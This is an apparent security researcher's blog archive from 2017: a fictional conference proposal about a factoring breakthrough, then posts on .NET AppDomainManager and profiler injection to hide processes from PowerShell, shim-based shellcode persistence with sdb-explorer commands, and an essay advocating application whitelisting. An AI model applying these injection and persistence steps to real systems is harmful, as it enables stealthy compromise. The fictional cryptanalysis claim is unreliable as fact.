Saturday, July 22, 2017

DEFCON 30 CFP: New Directions in Cryptanalysis, an Exploration of Disruptive Disclosure

I had some free time today, and started thinking about what would it be like to disclose a globally disruptive vulnerability. Where and how would you do that? I started thinking about what might this actually look like. So I chose the theme as a rogue cipher punk team that solves some critical equations. How would they get the word out. Safely? While I'm working out the details, this is my fictional write up of what that CFP looks like in 2022. I know its a bit different than my other blog posts. But hopefully highlights the dependency and brittleness we have if this were to ever occur. I don't think we can really imagine the scale of disruption.

So, here it is my 2022 DEFCON 30 CFP, a work of fiction. The setting is 5 years after a globally disruptive disclosure affecting cryptographic algorithms. This is the CFP submitted to DEFCON 30, in 2022 to outline the events that took place. The idea is less focused on the how it the equations were solved, and more on the "now what"... that they have been...How would you distill down what you needed to say in 90 minutes. What does the audience know, what have they lived through...

Here you go:

Title of Presentation: New Directions in Cryptanalysis, an Exploration of Disruptive Disclosure
Presentation Length: 80 minutes 10 Minutes Q&A
Presenters:  Mallory

Abstract:  Cryptography in the modern era was based on the assumption that certain mathematical problems are difficult to solve. These algorithms were said to be intractable. This talk explores how our team found a solution in polynomial-time to the Discrete Log Problem (DLP) and the Integer Factorization Problem (IFP). These two problems are closely related as you are now aware. What did we do when we found solutions to these problems? This talk will discuss the challenges our team faced in communicating our research. We will explore the mathematical primitives and assumptions that led to our solution. This talk will focus on the implications these solutions had on the global infrastructure.  We will also explain the background behind the Cipher Suite Resilience (CSR) standard, and how organizations can be better prepared for rapid cipher suite shifts. From signed Kernel Drivers to secure Authentication and Communication. The impact of this disclosure was far reaching. Hardly an area of modern technology was not affected by this disclosure. This talk will be a behind the scenes look at the events of 2017.  Including detailed information on how we disclosed the solution and remained anonymous. We think this talk will help organizations be better prepared for the next globally disruptive disclosure.

Bio: Mallory is a member of the Kult of Pythagoras (KoP), an international organization founded in 2005 with the idea that mathematical knowledge and solutions should no longer be held exclusively by any organization. These solutions and knowledge should be freely available for the benefit of humanity. The founding members are known only as Alice, Bob and Mallory.  In late 2017, Mallory revealed a solution to the Discrete Log Problem(DLP) and Integer Factorization Problem (IFP). Originally focused on internet security, their research has since had a direct impact on many fields including Genetics, Astronomy and many other Data-driven sciences. To this day the members of KoP remain anonymous.

Outline:

1. Who is the Kult of Pythagoras? What do we believe, and what is our mission? (3-5 minutes)

A brief introduction about each of the founding members.  Our objectives and philosophy.

2. Talk Introduction.  Outline of what we will cover.  (10 minutes)

Modern mathematical research is shrouded in a language and mystique of its own. We will discuss the challenges we faced bringing forwarded a solution to the DLP & IFP. What are the realities faced by researchers wanting to disclose a globally disruptive solution?  Who did we tell first? How did we maintain equality for global disclosure? What means were used to alert authorities and organizations that a solution had been found.  What was adequate lead time to allow organizations to prepare for the disclosure?

3. Vintage Cipher Suite Background and primitives. (5 minutes)
It has now been proven these are solvable and cryptographic systems that use these should be decommissioned. This will lay the foundation for how these problems are related.

Discrete Log Problem (DLP)
Integer Factorization Problem (IFP)
Root Finding Problem (RFP)

4.  Roots of Unity - The Square Root of One. ( 15 minutes )
The solution to DLP and IFP resides in an elegant number, the square root of 1.  It was known that the square root with a prime modulus can be found efficiently using the Tonelli-Shanks Algorithm. By applying this to a composite modulus we were able to efficiently find factors of a modulus of any size. This also led to an alternative way to compute the multiplicative inverse of an exponent, the basis for many cryptographic schemes.
5.  The Disclosure - How we did it. Safely. (20 Minutes )
Solving these problems was only the beginning. Disclosing the solution to these problems is not often considered when working on a solution. The impact of solving these equations is of immense interest to certain individuals and organizations. In order to ensure that these solutions were not suppressed, we devised a scheme to announce to the world that we indeed had access to such solutions and were prepared to disclose them, for free. In order to better prepare the global community for our disclosure, Mallory devised a scheme for both proving to the world that we had a solution, and at the same time, protecting that solution until organizations were prepared. This is now known anecdotally as the "Your Crypto Has No Clothes" memo of December 2017. This led to a global effort to remove vulnerable cipher suites. While many organizations were caught unprepared, we feel that the gap between the memo and disclosure, allowed competent organizations to be understand what was on the horizon and to prepare.

6.  The Chase - How we were hunted. How we stayed safe. (10 Minutes )
Once we announced our intent to disclose, an organized effort took place to suppress the disclosure. By taking the proper countermeasures we were able to watch this unfold, and were alerted to encroachments on our privacy perimeter. Needless to say, there are people who did not want this solution to be disclosed. We quickly learned who was interested in suppressing this disclosure, and took steps to ensure the world got the solutions to these equations. We seek to inform future researchers of our lessons learned, and provide tips for future disruptive disclosure.

7. Cipher Suite Resilience (CSR) - Be ready for the next one. ( 10 Minutes )
In 2017 we learned how dependent our systems and protocols were in antiquated algorithms quickly. The disclosure revealed how critical, brittle and fragile our systems are and incapable of change. From this emerged the CSR, a suite of standards to prepare organizations, systems, and protocols for disruptive disclosures. We hope organizations are now adopting and implementing the recommendations in this standard.

8.  The Conclusion.  (5 Minutes )
We will close with our thoughts on the current events we see unfolding today.  The consequences of the lack of cipher resiliency, and ideas on how to move forward.

List of Conferences:  We have not presented this material to any other conferences.

Why is this a good fit for DEFCON:

We have been in attendance and participated in DEFCON for several years. We feel that our conversations and philosophies were heavily influenced by this community. We feel this is the best venue to bring forward the behind the scenes look at what happened in 2017. The responsible disclosure of these disruptive solutions proved to be much more difficult than we imagined. We hope to share our lessons learned so that other researchers can benefit.  We hope to inspire others to bring forward solutions that have been locked away.

Previous experience:
We have presented under different names at DEFCON, BlackHat, DerbyCon, multiple BSides events. We will present our original document of solutions for archive in the DEFCON proceedings.  

List of facilities requested: Mallory will provided a link to the video file securely to the organizers of DEFCON. This talk has been pre-recorded. In an effort to maintain our privacy, we hope you will accept this unusual talk delivery.

Monday, June 12, 2017

Attacking the CLR - AppDomainManager Injection

I have been interested in attacking CLR to be able to manipulate .NET apps, like PowerShell.
For example using .NET profilers here:

Recently I was reading this article about the CLR and execution events:

http://mattwarren.org/2017/02/07/The-68-things-the-CLR-does-before-executing-a-single-line-of-your-code/

One of the interesting things I stumbled on was this reference to CLR tuning:

https://github.com/dotnet/coreclr/blob/master/Documentation/project-docs/clr-configuration-knobs.md

Of particular interest I saw these environment variables that can be set. You can also set these in an app.config file.




AppDomain Managers are interesting in that they setup the environment, before your .NET app runs.

I'll keep this short.  You can manipulate the runtime, by getting your code to execute prior to the application.

Here's some code.



This also can work against PowerShell.exe too.  ;-)


I leave it to you to explore whats possible here.

Have fun, keep asking questions!





Cheers,

Casey
@subTee

Thursday, May 18, 2017

Subvert CLR Process Listing With .NET Profilers

I recently stumbled onto an interesting capability of the CLR.

"A profiler is a tool that monitors the execution of another application. A common language runtime (CLR) profiler is a dynamic link library (DLL) that consists of functions that receive messages from, and send messages to, the CLR by using the profiling API. The profiler DLL is loaded by the CLR at run time."

https://msdn.microsoft.com/en-us/library/bb384493(v=vs.110).aspx

So. whats the big deal, really?

Turns out in .NET 4 allows for Registry-Free Profiler Startup and Attach.  This can lead to some unintended consequences.

https://msdn.microsoft.com/en-us/library/ee471451(v=vs.100).aspx

In order for this work, you need to set 3 environment variables.

Again from MSDN:

Startup-Load Profilers


A startup-load profiler is loaded when the application to be profiled starts. The profiler is registered through the value of the following environment variable:
  • COR_ENABLE_PROFILING=1
Starting with the .NET Framework 4, you use either the COR_PROFILER or the COR_PROFILER_PATH environment variable to specify the location of the profiler. (Only COR_PROFILER is available in earlier versions of the .NET Framework.)
  • COR_PROFILER={CLSID of profiler}
  • COR_PROFILER_PATH=full path of the profiler DLL
If COR_PROFILER_PATH is not present, the common language runtime (CLR) uses the CLSID from COR_PROFILER to locate the profiler in the HKEY_CLASSES_ROOT of the registry. If COR_PROFILER_PATH is present, the CLR uses its value to locate the profiler and skips registry lookup. (However, you still have to set COR_PROFILER, as discussed in the following list of rules.)
So, if our objective is to hijack a .NET process, like say PowerShell, we don't really want a Profiler to load, we just want to be able to manipulate the process.  It turns out you can get a dll to load into the .NET process that is not even a Profiler.  This was interesting to me.  The CLSID is just random for this purpose.

So, I had this idea, I could write quick POC DLL that hides a process from PowerShell.  Well, short story is this.  If you load a Profiler, and don't properly setup the Profiler structures, then the .NET CLR will promptly eject your dll.

For details of how we hook and hide see this article.

Thats ok.  ;-)  So what I did was create a DLL that loads another DLL from memory, and then when my profiler gets evicted, my hooking dll will stay resident.  So the Profiler just becomes a bootstrap.

The result seen in this clip below.  We enumerate processes with Get-Process in a "non-profiled" PowerShell process.  We get the details just fine.  Then we set our environment variables, load our PowerShell process, and now, the processes are not seen.

Video:



Why does this matter.  As PowerShell become the window through which many sysadmins poll and interrogate the operating system.  By using attaching a malicious profiler, we can mold the output so to speak to be what we want.

This was just a very basic example.  I leave it up to you to explore further capabilities of tampering with the CLR/.NET applications through profilers.

Hope that was helpful.

Thats all for today.




Casey
@subTee





Wednesday, May 3, 2017

Using Application Compatibility Shims

Overview:

There have been number of blog posts and presentations on Application Compatibility Shims in the past [See References at End].  Application Compatibility is a framework to resolve issues with older applications; however, it has additional use cases that are interesting. For example, EMET is implemented using shims[1,2]. Please see the Reference section below for additional reading and resources.  In short, this document will focus on the following tactics: injecting shellcode via In-Memory patches and injecting a DLL into a 32bit process, and lastly, detection and shim artifacts will be discussed.  An In-Memory patch has this advantage over backdooring an executable: it this preserves the signature and integrity checks.  This technique can also bypass some Application Whitelisting deployments.  AppLocker, for example, would allow the startup of a trusted application, and then an In-Memory patch could be applied to alter the application.


Shim Installation:
The shim infrastructure is built into Windows PE loader. Shims can be applied to a process during startup. There is a two-step process that I will refer to as “Match and Patch”.  The Match process checks the registry on process create and looks for a relevant entry. If an entry is found, the Match process further checks the associated .sdb file for additional attributes, version number for example.  Based on my understanding, the sdb does need to be present on disk. I have not encountered any tactics to load an sdb file from memory or remotely. When the Shim Databases are installed they are registered in the registry at the following two locations:


HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB


These entries can be created manually, using sdb-explorer.exe, or using the built-in tool sdbinst.exe. If you use sdbinst.exe there will also be an entry created in the Add/Remove Programs section. In order to install a shim, you need local administrator privileges.


An example of a shim entry would look like this:




Once the shim has been installed, it will be triggered upon each execution of that application. Remember, there is further validation of the executable inside of the sdb file. For example, matching a specific version or binary pattern. I have not found a way to apply a shim when a DLL is loaded, or apply a shim to an already running process.  These registry keys plus the actual sdb file are the indicators for the Blue Team that a shim is present.  


Shim Creation and Detonation:
There are two tools we can use to create shims. First, the Microsoft provided Application Compatibility Toolkit (ACT).  Second, the tool created by Jon Erickson, sdb-explorer.exe.  ACT will allow us to inject a DLL into a 32-bit process, while sdb-explorer allows us to create an In-Memory binary patch to inject shellcode. The ACT has no ability to parse or create an In-Memory patch. This can only be done via sdb-explorer.


There is an excellent walk-through here on creating an InjectDLL Demo.


For the remainder of this document, we will focus on using sdb-explorer to create and install an In-Memory patch.


My testing seems to indicate this will not work on Windows 10.  This tactic will only work on Windows versions <= 8.1.  I could be wrong about this, so please share any insight if you have it.


There are two approaches you can take with sdb-explorer.  First, you can simply Replace or write arbitrary bytes to a region in memory. Second, you can match a block of bytes and overwrite. There are advantages and disadvantages to both approaches. It is worth noting that this method of persistence will be highly specialized to the environment you are operating in. For example, you will need to know specific offsets in the binary   




For this to work, we need an offset to write out shellcode to. I like to use CFF Explorer.


Here we are going to target the AddressOfEntryPoint. There are other approaches as well.  The drawback to this approach is the application doesn’t actually execute. In order to do that you would need to execute your patch and then return control to the application.  I leave that as an exercise for the reader.


Once we have the offset, we can use the syntax provided by sdb-explorer to write our shellcode into the process at load time.


If we break down the syntax, it is pretty easy to understand.


Line 7. 0x39741 matches the PE Checksum. This is in the PE Header.




Line 8. 0x3689 is the offset of our AddressOfEntryPoint.  What follows is just stock shellcode to execute calc.


Once our configuration file is created, we “compile” or create the sdb.
sdb-explorer.exe –C notepad.conf –o notepad.sdb.


Then install it:


sdb-explorer.exe –r notepad.sdb –a notepad.exe


You can also use:


sdbinst –p notepad.sdb.


In either case it requires local administrative rights to install a shim.


Notepad.exe is nice. But more likely shim targets would be explorer.exe, lsass.exe, dllhost.exe, svchost.exe. Things that give you long term persistence. Of course your shellcode would need to return control to the application, instead of just hijacking AddressOfEntryPoint.


Shim Detection:
There are two primary indicators that a shim is being used. First, the registry keys mentioned above.  Second, the presence of the .sdb file. The presence of the .sdb file is not necessarily bad, it would be wise to build a baseline to understand which shims your organization uses and which would be an indicator. There was a good example of detecting shim databases given here:  Hunting Memory, on slide 27.  Also, some shim registration activity can be recorded in the Microsoft-Windows-Application-Experience-Program-Telemetry.evtx.


Cheers,


Casey
@subTee


References:





Wednesday, April 26, 2017

Consider Application Whitelisting with Device Guard



I realize that Twitter is a difficult medium to articulate full discussions, so I wanted to engage the topic with a blog post. Over the last couple years, I have focused a fair amount of time drawing attention to the use/misuse of trusted binaries to circumvent Application Whitelisting (AW) controls.  What I have not often discussed, is the actual effectiveness that I have seen of using AW. I would like to take the time to describe what I see are the strengths of AW, and encourage organizations to consider if it might work for their environments.
The genesis of this discussion came from my colleague, Matt Graeber (@mattifestation).  We’ve spent a fair amount of time looking at this technology as it applies to Microsoft’s Device Guard. And while we agree there are bypasses, we also believe that a tool like Device Guard can dramatically reduce the attack surface and tools available to an adversary.
One question you must ask yourself and your organization is this… How long will you allow the adversary to use EXE/DLL tradecraft to persist and operate in your environment? I have heard a great deal of discussion and resistance to deploying AW. However, I personally have not heard anyone who has deployed the technology say that they regret whitelisting.
When the organization I used to work for deployed AW in 2013, it freed up our team from several tasks.  It gave us time to hunt and prepare for the more sophisticated adversary.  There are many commodity attacks and targeted attacks that take various forms.  However, one commonality they all often share is to drop an EXE or DLL to disk and execute. It is this form of attack that you can mitigate with AW.  With whitelisting, you force the adversary to retool and find new tradecraft, because unapproved, unknown binaries will not execute…
How long will you continue to perform IR and hunt C2 that is emitted from an unapproved PE file?
Here are some of the common reasons I have heard for NOT implementing AW. There are probably others, but this summarizes many.


1.     Aren’t there trivial bypasses? It doesn’t stop all attacks.
2.     Too much effort.
3.     It doesn’t scale.
I’ll take each of these and express my opinion. I’m open to dialogue on this and if I’m wrong, I would like to hear it and correct course…
1.     Aren’t there trivial bypasses to AW?  It doesn’t stop all attacks.
There are indeed ways to bypass AW.  I have found a few.  However, most of the bypasses I have demonstrated require that you have already obtained access to, and have the ability to execute commands on the target system. How does the attacker gain that privilege in the first place if you deny them arbitrary PE’s?  Most likely it will be from a memory corruption exploit in the browser or other application.  How many exploit kits, macros, or tools lead to dropping a binary and executing it?  Many do…
Most of the bypasses I have used are rooted in misplaced trust.  Often administrators of AW follow a pattern of “Scan A Gold Image & Approve Everything There”.  As Matt Graeber has pointed out to me several times, this is not the best approach.  There are far too many binaries that are included by default that can be abused. A better approach here is to explicitly trust binaries or publishers of code.  I can’t think of a single bypass that I have discovered that can’t be mitigated by the whitelist itself.  For example, use the whitelist to block regsvr32.exe or InstallUtil.exe.
Don’t fall victim to the Perfect Solution Fallacy.  The fact that AW doesn’t stop all attacks, or the fact that there are bypasses, is no reason to dismiss this as a valid defense.


“Nobody made a greater mistake than he who did nothing because he could do only a little.” –Edmund Burke
AW, in my opinion, can help you get control of software executing in your environment. It actually gives teeth to those Software Installation Policies. For example, it only takes that one person trying to find the Putty ssh client, and downloading a version with a backdoor to cause problems in your network.  For an example of how to backdoor putty see this recent post. Or use The Backdoor Factory (BDF). The thing is, it doesn’t matter that putty has a backdoor.  The original file has been altered, and will not pass the approval process for the whitelist, and the file will be denied execution. Only the approved version of putty would be able to execute in your environment.
2.     Too much effort.
Well… I’ve heard this, or some variation of it.  I understand that deploying and maintaining AW takes tremendous effort if you want to be successful.  It actually will take training multiple people to know how to make approvals and help with new deployments.
You will actually have to work very closely with your client teams, those in IT that manage the endpoints.  These partnerships can only strengthen the security team’s ability to respond to incidents. You can leverage tools like SCCM to assist with AW approvals and deployments.
The level of effort decreases over time.  Yes, there will be long hours on the front end, deploying configurations, reviewing audit logs, updating configs, etc… Some admins are so worried they will block something inadvertently; they are paralyzed to even try.  I think you’ll find out, Yes, you will block something legitimate.  Accept that this will happen, it’s a learning process, take it in steps.  Use that as an opportunity to get better.
I’ll say it again; I haven’t met anyone who has made the effort to deploy AW say that they regret the decision…
If you think it’s too hard, why not try 10% of the organization and see what you learn?
Stop telling me you aren’t doing this because it’s too hard… Anything worth doing well is going to require some effort and determination.
3.     It doesn’t scale.
Nope, it may not in your environment.  I never said it would… You must decide how far to go.  You may not get AW everywhere, but you can still win with it deployed in critical locations.  The image below describes how I think about how AW applies to different parts of your organization.  It is not a one-size-fits-all solution.  There are approaches and patterns that affect how you will deploy and configure whitelists. I think you should start with the bottom, and work your way up the stack.
Start to think of your environment in terms of how dynamic the systems are.  At the low end of the are those fixed function systems.  Think about systems similar to Automated Teller Machines.  These often only need to be able to apply patches.  New software rarely ever lands here.  Next, you have various department templates, each department will be unique, but likely fits a pattern.  Then IT Admins, who often need to install software to test or have more dynamic requirements.  At the top of the environment, are Developer workstations.  These are systems that are emitting code and testing.  I’m not saying you can’t whitelist here.  You can, I’ve done it.  But it will require some changes to build processes, code signing etc…


Yes, this is an overly simplified analogy, but I hope it helps you see where you can begin to prioritize AW deployments.
So, begin to reorient how you think about your systems to how dynamic they are.  You will have your quickest wins and earliest wins by starting at the bottom and moving your way up the hierarchy.


Conclusion


I am curious for open debate here.  If AW sucks, then let me hear why.  Tell me what your experience has been.  What would have made it work?  I’m interested in solutions that make a long term actual difference in your environment.  It is my opinion that AW works, despite some flaws.  It can dramatically reduce the attack patterns used by an adversary and increase the noise they generate.  I also believe that by implementing AW, your security teams can gain efficiencies how they operate. I am open to learn here.
If you are tasked with defending your organization, I’m asking you, as you begin to roll out Windows 10, to consider using Device Guard.


Ok, that’s all I have today.  Sincere feedback welcome.  If you think I’m wrong, I’d like to hear why...

Cheers,

Casey
@subTee